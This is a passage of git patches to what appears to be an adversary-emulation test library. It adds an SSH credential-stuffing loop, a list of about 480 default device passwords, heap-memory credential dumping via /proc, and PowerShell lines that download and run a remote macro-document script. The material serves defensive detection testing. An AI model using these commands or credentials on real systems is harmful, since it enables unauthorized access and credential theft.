sshpass -y; else echo "This test requires sshpass" ; fi ; + + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + +- name: SSH Credential Stuffing From MacOS + description: | + Using username,password combination from a password dump to login over SSH. + + supported_platforms: + - macos + + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + + dependency_executor_name: bash + dependencies: + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" + brew install hudochenkov/sshpass/sshpass + + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + diff --git a/atomics/T1110.004/src/credstuffuserpass.txt b/atomics/T1110.004/src/credstuffuserpass.txt new file mode 100644 index 00000000..ed0295f7 --- /dev/null +++ b/atomics/T1110.004/src/credstuffuserpass.txt @@ -0,0 +1,482 @@ +ADMINISTRATOR:ADMINISTRATOR +ADMN:admn +Administrator:3ware +Administrator:admin +Administrator:changeme +Administrator:ganteng +Administrator:letmein +Administrator:password +Administrator:pilou +Administrator:smcadmin +Any:12345 +CSG:SESAME +Cisco:Cisco +D-Link:D-Link +DTA:TJM +GEN1:gen1 +GEN2:gen2 +GlobalAdmin:GlobalAdmin +HTTP:HTTP +IntraStack:Asante +IntraSwitch:Asante +JDE:JDE +LUCENT01:UI-PSWD-01 +LUCENT02:UI-PSWD-02 +MDaemon:MServer +MICRO:RSX +Manager:Manager +Manager:friend +NAU:NAU +NETWORK:NETWORK +NICONEX:NICONEX +PBX:PBX +PFCUser:240653C9467E45 +PRODDTA:PRODDTA +PSEAdmin:$secure$ +PlcmSpIp:PlcmSpIp +Polycom:SpIp +RMUser1:password +SYSADM:sysadm +Sweex:Mysweex +USERID:PASSW0RD +User:Password +VNC:winterm +VTech:VTech +ZXDSL:ZXDSL +acc:acc +adfexc:adfexc +admin:0 +admin:0000 +admin:1111 +admin:11111111 +admin:123 +admin:1234 +admin:123456 +admin:1234567890 +admin:1234admin +admin:2222 +admin:22222 +admin:3477 +admin:3ascotel +admin:7ujMko0admin +admin:7ujMko0vizxv +admin:9999 +admin:Admin +admin:AitbISP4eCiG +admin:Ascend +admin:BRIDGE +admin:Intel +admin:MiniAP +admin:NetCache +admin:NetICs +admin:OCS +admin:P@55w0rd! +admin:PASSWORD +admin:Protector +admin:SMDR +admin:SUPER +admin:Symbol +admin:TANDBERG +admin:_Cisco +admin:access +admin:admin +admin:admin117.35.97.74 +admin:admin123 +admin:admin1234 +admin:administrator +admin:adminttd +admin:adslolitec +admin:adslroot +admin:adtran +admin:articon +admin:asante +admin:ascend +admin:asd +admin:atc123 +admin:atlantis +admin:backdoor +admin:barricade +admin:barricadei +admin:bintec +admin:cableroot +admin:changeme +admin:cisco +admin:comcomcom +admin:conexant +admin:default +admin:diamond +admin:enter +admin:epicrouter +admin:extendnet +admin:fliradmin +admin:giraff +admin:hagpolm1 +admin:hello +admin:help +admin:hp.com +admin:ironport +admin:isee +admin:jvc +admin:kont2004 +admin:letmein +admin:leviton +admin:linga +admin:meinsma +admin:michaelangelo +admin:michelangelo +admin:microbusiness +admin:motorola +admin:mu +admin:my_DEMARC +admin:netadmin +admin:noway +admin:oelinux123 +admin:operator +admin:p-assword +admin:pass +admin:password +admin:passwort +admin:pento +admin:pfsense +admin:private +admin:public +admin:pwp +admin:radius +admin:rmnetlm +admin:root +admin:secure +admin:service +admin:setup +admin:sitecom +admin:smallbusiness +admin:smcadmin +admin:speedxess +admin:superuser +admin:support +admin:switch +admin:synnet +admin:sysAdmin +admin:system +admin:tech +admin:ubnt +admin:visual +admin:w2402 +admin:wbox +admin:xad$l#12 +admin:xad$|#12 +admin:zoomadsl +admin2:changeme +administrator:administrator +administrator:changeme +adminstat:OCS +adminstrator:changeme +adminttd:adminttd +adminuser:OCS +adminview:OCS +alpine:alpine +anonymous:Exabyte +anonymous:any@ +apc:apc +at4400:at4400 +bbsd-client:NULL +bbsd-client:changeme2 +bciim:bciimpw +bcim:bcimpw +bcms:bcmspw +bcnas:bcnaspw +bcnas:pcnaspw +blue:bluepw +browse:browsepw +browse:looker +cablecom:router +cablemodem:robotics +cac_admin:cacadmin +cas:cascade +ccrusr:ccrusr +cellit:cellit +cgadmin:cgadmin +cisco:cisco +citel:citel +client:client +cmaker:cmaker +comcast:1234 +corecess:corecess +craft:craft +craft:craftpw +craft:crftpw +cusadmin:highspeed +cust:custpw +customer:none +dadmin:dadmin01 +davox:davox +debug:d.e.b.u.g +debug:synnet +default:antslq +default:default +default:password +deskalt:password +deskman:changeme +desknorm:password +deskres:password +device:device +dhs3mt:dhs3mt +dhs3pms:dhs3pms +diag:danger +diag:switch +disttech:4tas +draytek:1234 +e250:e250changeme +e500:e500changeme +echo:User +echo:echo +eng:engineer +enquiry:enquirypw +field:support +guest:1111 +guest:12345 +guest:123456 +guest:User +guest:guest +guest:xc3511 +halt:tlah +helpdesk:OCS +hsa:hsadb +hscroot:abc123 +iclock:timely +images:images +inads:inads +inads:indspw +init:initpw +install:llatsni +install:secret +installer:installer +intel:intel +intermec:intermec +intermec:intermec1QTPS +kermit:kermit +l2:l2 +l3:l3 +locate:locatepw +login:0 +login:1111 +login:8429 +login:access +login:admin +login:password +lp:lp +m1122:m1122 +maint:maint +maint:maintpw +maint:ntacdmax +maint:rwmaint +manage:!manage +manager:admin +manager:change_on_install +manager:friend +manager:manager +manager:sys +manuf:xxyyzz +mediator:mediator +mg3500:merlin +mlusr:mlusr +monitor:monitor +mother:fucker +mtch:mtch +mtcl:mtcl +naadmin:naadmin +netangr:attack +netman:netman +netopia:netopia +netrangr:attack +netscreen:netscreen +nms:nmspw +nokai:nokai +nokia:nokia +none:0 +none:admin +op:op +op:operator +operator:$chwarzepumpe +operator:1234 +operator:operator +oracle:oracle +patrol:patrol +piranha:piranha +piranha:q +poll:tech +public:public +radware:radware +rapport:r@p8p0r+ +rcust:rcustpw +readonly:lucenttech2 +readwrite:lucenttech1 +recovery:recovery +replicator:replicator +ro:ro +root:000000 +root:1111 +root:1234 +root:12345 +root:123456 +root:1234567890 +root:1234qwer +root:123qwe +root:1q2w3e4r5 +root:3ep5w2u +root:54321 +root:666666 +root:7ujMko0admin +root:7ujMko0vizxv +root:888888 +root:Admin +root:Cisco +root:GMB182 +root:LSiuY7pOmZG2s +root:Mau'dib +root:PASSWORD +root:ROOT500 +root:Serv4EMC +root:Zte521 +root:abc123 +root:admin +root:admin1234 +root:admin_1 +root:ahetzip8 +root:alpine +root:anko +root:antslq +root:ascend +root:attack +root:avtech +root:b120root +root:bananapi +root:blender +root:calvin +root:changeme +root:cms500 +root:comcom +root:coolphoenix579 +root:davox +root:default +root:dreambox +root:fivranne +root:ggdaseuaimhrke +root:hi3518 +root:iDirect +root:ikwb +root:ikwd +root:jauntech +root:juantech +root:jvbzd +root:klv123 +root:klv1234 +root:letacla +root:maxided +root:oelinux123 +root:openssh +root:openvpnas +root:orion99 +root:pa55w0rd +root:pass +root:password +root:permit +root:realtek +root:root +root:tini +root:tslinux +root:ubnt +root:user +root:vizxv +root:wyse +root:xc3511 +root:xmhdipc +root:zlxx. +root:zte9x15 +router:router +rw:rw +rwa:rwa +scmadmin:scmchangeme +scout:scout +secret:secret +secure:secure +security:security +service:smile +setup:changeme +setup:changeme! +setup:setup +smc:smcadmin +spcl:0 +storwatch:specialist +stratacom:stratauser +su:super +super:5777364 +super:super +super:surt +super.super:master +superadmin:secret +superman:21241036 +superman:talent +superuser:123456 +superuser:admin +supervisor:PlsChgMe! +supervisor:PlsChgMe1 +supervisor:supervisor +supervisor:zyad1234 +support:123 +support:1234 +support:12345 +support:123456 +support:admin +support:h179350 +support:login +support:support +support:supportpw +support:zlxx. +sys:uplink +sysadm:Admin +sysadm:PASS +sysadm:anicust +sysadm:sysadm +sysadmin:PASS +sysadmin:password +sysadmin:sysadmin +system:change_on_install +system:password +system:sys +system/manager:sys/change_on_install +target:password +teacher:password +tech:ANYCOM +tech:ILMI +tech:field +tech:tech +telco:telco +telecom:telecom +tellabs:tellabs#1 +telnet:telnet +temp1:password +test:test +tiara:tiaranet +tiger:tiger123 +topicalt:password +topicnorm:password +topicres:password +ubnt:ubnt +user:123456 +user:pass +user:password +user:public +user:tivonpw +user:user +vcr:NetVCR +volition:volition +vt100:public +webadmin:1234 +webadmin:webadmin +websecadm:changeme +wlse:wlsedb +wradmin:trancell +write:private +xd:xd +xxx:cascade +zyfwp:PrOw!aN_fXp From 47e1147dc1299bd7ae92677b20bcf9b22bdc25ff Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Fri, 4 Jun 2021 17:14:49 -0600 Subject: [PATCH 08/84] Added T1003.007 OS Credential Dumping: Proc Filesystem --- atomics/T1003.007/T1003.007.yaml | 56 ++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 atomics/T1003.007/T1003.007.yaml diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml new file mode 100644 index 00000000..5ed6039e --- /dev/null +++ b/atomics/T1003.007/T1003.007.yaml @@ -0,0 +1,56 @@ +--- +attack_technique: T1003.007 +display_name: 'OS Credential Dumping: Proc Filesystem' +atomic_tests: +- name: Dump individual process memory (Local) + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, + copy process memory to an external file so it can be searched or exfiltrated later. + + supported_platforms: + - linux + + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007.bin + script_path: + description: Path to script generating the target process + type: Path + default: /tmp/T1003.007.sh + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + + dependencies: + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Script to launch target process must be executable + prereq_command: | + test -x #{script_path} + get_prereq_command: | + chmod +x #{script_path} + + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) + MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) + MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) + MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + grep -i "PASS" "#{output_file}" + cleanup_command: | + rm -f "#{output_file}" From 6b3206b3789d24064cc43359a19aa9f1763ab748 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Tue, 8 Jun 2021 16:49:23 -0600 Subject: [PATCH 09/84] added Python script for T1003.007 --- atomics/T1003.007/T1003.007.yaml | 64 ++++++++++++++++++++++++++---- atomics/T1003.007/src/dump_heap.py | 31 +++++++++++++++ 2 files changed, 87 insertions(+), 8 deletions(-) create mode 100644 atomics/T1003.007/src/dump_heap.py diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index 5ed6039e..d6e49b4a 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -2,9 +2,9 @@ attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: -- name: Dump individual process memory (Local) +- name: Dump individual process memory with sh (Local) description: | - Using `/proc/$PID/mem`, where $PID is the target process ID, + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: @@ -33,12 +33,6 @@ atomic_tests: get_prereq_command: | echo '#!/bin/sh' > #{script_path} echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - - description: | - Script to launch target process must be executable - prereq_command: | - test -x #{script_path} - get_prereq_command: | - chmod +x #{script_path} executor: name: sh @@ -54,3 +48,57 @@ atomic_tests: grep -i "PASS" "#{output_file}" cleanup_command: | rm -f "#{output_file}" + +- name: Dump individual process memory with Python (Local) + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so it can be searched or exfiltrated later. + + supported_platforms: + - linux + + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: /tmp/T1003.007.bin + script_path: + description: Path to script generating the target process + type: Path + default: /tmp/T1003.007.sh + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + + dependencies: + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Requires Python + prereq_command: | + (which python || which python3 || which python2) + get_prereq_command: | + echo "Python 2.7+ or 3.4+ must be installed" + + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: | + rm -f "#{output_file}" diff --git a/atomics/T1003.007/src/dump_heap.py b/atomics/T1003.007/src/dump_heap.py new file mode 100644 index 00000000..34d479c7 --- /dev/null +++ b/atomics/T1003.007/src/dump_heap.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +'''Dump a process's heap space to disk + +Usage: + python dump_proc.py +''' +import argparse + + +parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk') +parser.add_argument('pid', type=int, help='ID of process to dump') +parser.add_argument('filepath', help='A filepath to save output to') +args = parser.parse_args() + +process_id = args.pid +output_file = args.filepath + +with open("/proc/{}/maps".format(process_id), "r") as maps_file: + # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0 [heap] + heap_line = next(filter(lambda line: "[heap]" in line, maps_file)) + heap_range = heap_line.split(' ')[0] + mem_start = int(heap_range.split('-')[0], 16) + mem_stop = int(heap_range.split('-')[1], 16) + mem_size = mem_stop - mem_start + +with open("/proc/{}/mem".format(process_id), "rb") as mem_file: + mem_file.seek(mem_start, 0) + heap_mem = mem_file.read(mem_size) + +with open(output_file, "wb") as ofile: + ofile.write(heap_mem) From a3e66311c51e1f9e1727b6946e68a621c4bdf521 Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Wed, 9 Jun 2021 11:51:35 -0500 Subject: [PATCH 10/84] Update T1204.002.yaml (#1503) added pls version setting to tests using IWR Co-authored-by: Carrie Roberts --- atomics/T1204.002/T1204.002.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 971dda55..8c749447 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -36,6 +36,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -91,6 +92,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -126,6 +128,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -160,6 +163,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -285,6 +289,7 @@ atomic_tests: Write-Host "You will need to install Google Chrome manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell From 7e64b11098bbae06475f2745b78332ff68ebd058 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:52:02 +0000 Subject: [PATCH 11/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 +++++ atomics/T1204.002/T1204.002.md | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ffb927c7..db3672dc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -58262,6 +58262,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58323,6 +58324,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58361,6 +58363,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -58398,6 +58401,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -58532,6 +58536,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index eda78a1e..fdd9a4c2 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -50,6 +50,7 @@ References: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -138,6 +139,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -188,6 +190,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" @@ -237,6 +240,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} @@ -390,6 +394,7 @@ and pull down the script and execute it. By default the payload will execute cal ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" ``` From 0b52ed3a400f1afacb7860e75416bb849325b60b Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 9 Jun 2021 10:55:25 -0600 Subject: [PATCH 12/84] remove unused arg, utilize other arg (#1497) --- atomics/T1221/T1221.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml index 631277c1..3c554c5f 100644 --- a/atomics/T1221/T1221.yaml +++ b/atomics/T1221/T1221.yaml @@ -4,18 +4,17 @@ atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d description: | - Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. + Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + Executes the code specified within the .dotm template. + Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: | @@ -23,5 +22,5 @@ atomic_tests: get_prereq_command: | executor: command: | - start PathToAtomicsFolder\T1221\src\Calculator.docx + start #{docx_file} name: command_prompt From 1203ffc740b4d70073337b7dd30c2af1d5715e51 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Jun 2021 16:56:00 +0000 Subject: [PATCH 13/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 20 ++++++++------------ atomics/T1221/T1221.md | 10 ++++++---- 2 files changed, 14 insertions(+), 16 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index db3672dc..6715564c 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -34289,30 +34289,26 @@ defense-evasion: atomic_tests: - name: WINWORD Remote Template Injection auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d - description: 'Open a .docx file that loads a remote .dotm macro enabled template. - Executes the code specified within the .dotm template.Requires download of - WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens - Calculator.exe when test sucessfully executed, while AV turned off. - -' + description: "Open a .docx file that loads a remote .dotm macro enabled template + from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm + \nExecutes the code specified within the .dotm template.\nRequires download + of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. + \ \nDefault docs file opens Calculator.exe when test sucessfully executed, + while AV turned off.\n" supported_platforms: - windows input_arguments: - docx file: + docx_file: description: Location of the test docx file on the local filesystem. type: Path default: PathToAtomicsFolder\T1221\src\Calculator.docx - dotm template: - description: Location of the test dotm template on the remote server. - type: Path - default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm dependency_executor_name: powershell dependencies: - description: '' prereq_command: '' get_prereq_command: '' executor: - command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx + command: 'start #{docx_file} ' name: command_prompt diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index fbad78bd..9f9d5708 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,7 +16,10 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
## Atomic Test #1 - WINWORD Remote Template Injection -Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. Opens Calculator.exe when test sucessfully executed, while AV turned off. +Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm +Executes the code specified within the .dotm template. +Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. +Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off. **Supported Platforms:** Windows @@ -26,15 +29,14 @@ Open a .docx file that loads a remote .dotm macro enabled template. Executes the #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| -| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm| +| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder\T1221\src\Calculator.docx| #### Attack Commands: Run with `command_prompt`! ```cmd -start PathToAtomicsFolder\T1221\src\Calculator.docx +start #{docx_file} ``` From 3ae4d98bb8ed941503f6be3bb07e582b8bd1e832 Mon Sep 17 00:00:00 2001 From: rctgardner <59621072+rctgardner@users.noreply.github.com> Date: Tue, 8 Jun 2021 18:05:29 -0600 Subject: [PATCH 14/84] Added 2 